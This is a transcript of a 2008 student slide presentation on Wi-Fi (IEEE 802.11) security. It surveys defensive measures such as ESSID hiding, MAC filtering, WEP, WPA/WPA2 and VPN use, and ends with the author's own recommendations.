Transcript Security in IEEE 802.11 wireless networks

Security in IEEE 802.11
wireless networks
Piotr Polak
University Politehnica of Bucharest, December 2008
About IEEE 802.11
 IEEE 802.11 is set of standards created for building wireless
networks.
 IEEE 802.11 grants the interoperability between different wireless
devices.
 IEEE 802.11 is often called Wi-Fi (Wireless Fidelity)
 Wi-Fi Alliance, was founded in 1999 as WECA (Wireless Ethernet
Compatibility Alliance).
 In some countries the term "Wi-Fi" is often used by the public as a
synonym for wireless internet (W-LAN)
 Wi-Fi certified technologies are supported by nearly every modern
personal computer operating system, most advanced game
consoles, laptops, smartphones and many printers and other
peripherals.
About IEEE 802.11
 IEEE 802.11 uses free frequencies between 2400 to 2485 MHz (for
802.11b and 802.11g) and 5000 MHz (for 802.11a).
 The band 2.4 GHz is split into 14 channels for Europe, 11 channels
for USA.
 Transmition speed depends on the devices used and distances
between stations and can take values of 11, 22, 44, 54 or 108 Mbps.
Security principles
 Security includes preventing unauthorized users to access the
network and encrypting all the network traffic so that nobody from
outside the network can sniff the information transmitted between
users and/or devices.
 Wireless networks will always remain less secure than traditional
wired networks since all the signals are transmitted trough ether.
Basic methods
 Disabling the ESSID broadcast and changing the default network
ESSID introduced by manufacturer
 MAC address filtering
 Assigning static IP to devices
 Traffic encryption (WEP, WPA, WPA2)
 External authorization using RADIUS server
 VPN
 Limiting the range of the network
Disabling the ESSID broadcast
 Hiding ESSID was introduced in the first Access Points as a
“protection method”, ESSID as the “password”
 The user must provide the ESSID (network identifier) to connect to
the network
 Not a real security method, nowadays ESSID is relatively easy to
find
 Good for hiding the network from neighbors
 Might be dangerous when a malicious AP broadcasting friendly
named network is created in the neighborhood area
MAC address filtering
 MAC (Media Access Control) are unique identifiers assigned to the
network device
 MAC filtering consists of creating the “white list” of accepted clients
 Only the registered clients can gain the access to the network
 Should be used along other protection methods, MAC address in an
unencrypted network can be easily found and “imitated” (using
Macshift)
 Can prevent from less experienced users
Assigning static IP to devices
 Method similar to MAC address filtering
 Every device is registered, a static IP address is assigned to a
specific MAC address
 To be used along with a router having a good traffic policy – only
selected IPs can communicate to other hosts, etc.
WEP
 Wired Equivalent Privacy was included as the privacy of the original
IEEE 802.11 standard ratified in September 1999
 Provides both authorization (basic) and encryption security
 Standard 64-bit WEP uses a 40 bit key (also known as WEP-40),
which is concatenated with a 24-bit initialization vector (IV) to form
the RC4 traffic key
 Key size security limitation, easy to crack using Stream cipher attack
 Uses static keys – the keys are generated once according to the
password
 Using longer keys slows down the network
 Currently not recommended, considered as deprecated
WPA/WPA2
 WPA (Wi-Fi Protected Access) was introduced in 2004 to replace
weak WEP and is hardware compatible
 WPA implemented a subset of 802.11i and makes use of the
Advanced Encryption Standard (AES)
 IEEE 802.11i-2004 introduced new key distribution methods, the
keys are no longer static (a serious issue of previous WPA)
 Uses 802.1X for authentication, Extensible Authentication Protocol,
AES-based CCMP to provide confidentiality, integrity and origin
authentication
 WPA2 certification is mandatory for all new devices to bear the Wi-Fi
trademark
Personal WPA2
 For home and small office use
 Uses PSK (Pre Shared Key). The passphrase (“the password”) used
for connecting the network may be from 8 to 63 printable ASCII
characters or 64 hexadecimal digits (256 bits).
 Random PSK of length 13 are considered secure, shorter PSK are
not enough to protect from Brute Force Attack
VPN






VPN stands for Virtual Private Networks
VPN creates secure tunnels between the client and VPN server
Provides user authorization and transition encryption
Uses compression to reduce the bandwidth
More resource expensive than WPA/WEP
Some routers do not pass VPN trough
Range of the network
 If you use a single device position your Access point in the middle of
the office/building so that the signal can be uniformly distributed.
 Limit the antenna power so that the network is inaccessible from
outside the office – this will prevent from attacks from outside.
Otherwise anybody parked in front of your building can attempt to
connect to your network and you will have no chance to locate him.
Conclusions
 For my home wireless network I use Personal WPA2 (AES) with a
randomly generated passphrase, the passphrase is changed
periodically and is of length 63. Moreover all my devices are
registered in the MAC whitelist and have static IPs associated by
DHCP server.
 When I use public hotspots I no matter WPA is used or no, I connect
to the Internet using my own VPN server so that even if the traffic is
sniffed at any of the pass-trough points, all the data I send and
receive is safe.
 If I had to implement an enterprise network, I would use all the
protection methods described in the first point, VPN and I would
configure AP/Router in such way so that only VPN connections to
the VPN server are allowed. I find it simpler than RADIUS or
WPA2/Enterprise.
Conclusions
 Change your devices’ default passwords and other sensitive settings
 Don’t let any user to extend the network by adding misconfigured
devices. Even single unprotected Access Point can affect the
security of the whole system.
Bibliography and usefull links






http://www.wifi.owe.pl/?id=ukrycie_essid
http://en.wikipedia.org/wiki/Wpa2
http://www.warchalking.pl/
http://en.wikipedia.org/wiki/Wired_Equivalent_Privacy
http://hack.pl/artykuly/wardriving/bezpieczenstwo_sieci_bezprzewodowych_
90
http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm